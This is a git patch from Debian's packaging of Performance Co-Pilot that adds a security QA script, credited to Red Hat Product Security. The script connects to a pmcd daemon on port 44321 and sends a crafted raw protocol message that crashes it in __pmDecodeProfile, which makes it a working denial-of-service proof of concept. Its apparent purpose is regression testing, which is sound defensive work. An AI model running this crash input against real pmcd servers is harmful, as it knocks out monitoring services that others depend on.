From 47e6e7c84f008a53061e661f31ae96629bc694ef Mon Sep 17 00:00:00 2001
From: Igor Pashev <pashev.igor@gmail.com>
Date: Sun, 26 Oct 2014 12:33:50 +0400
Subject: Debian 3.9.10

---
 qa/secure/crash-profile | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100755 qa/secure/crash-profile

(limited to 'qa/secure/crash-profile')

diff --git a/qa/secure/crash-profile b/qa/secure/crash-profile
new file mode 100755
index 0000000..2a0e5af
--- /dev/null
+++ b/qa/secure/crash-profile
@@ -0,0 +1,22 @@
+#
+# usage: python crash-profile HOST
+#
+# Connects to pmcd on HOST and triggers a crash in __pmDecodeProfile.
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+import pcppdu
+_, host = sys.argv
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+pcppdu.client_handshake(sock, from_=1)
+pcppdu.send_pmns_names(sock, from_=1, names=(str("hinv.ncpu"),))
+ids = pcppdu.parse_pmns_ids(pcppdu.read_pdu(sock))
+pmid = ids[1].idlist[0]
+pcppdu.send_desc_req(sock, from_=1, pmid=pmid)
+# print(pcppdu.parse_desc(pcppdu.read_pdu(sock)))
+sock.send(str('\x00\x00\x00(\x00\x00p\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
+
+sock.close()
-- 
cgit v1.2.3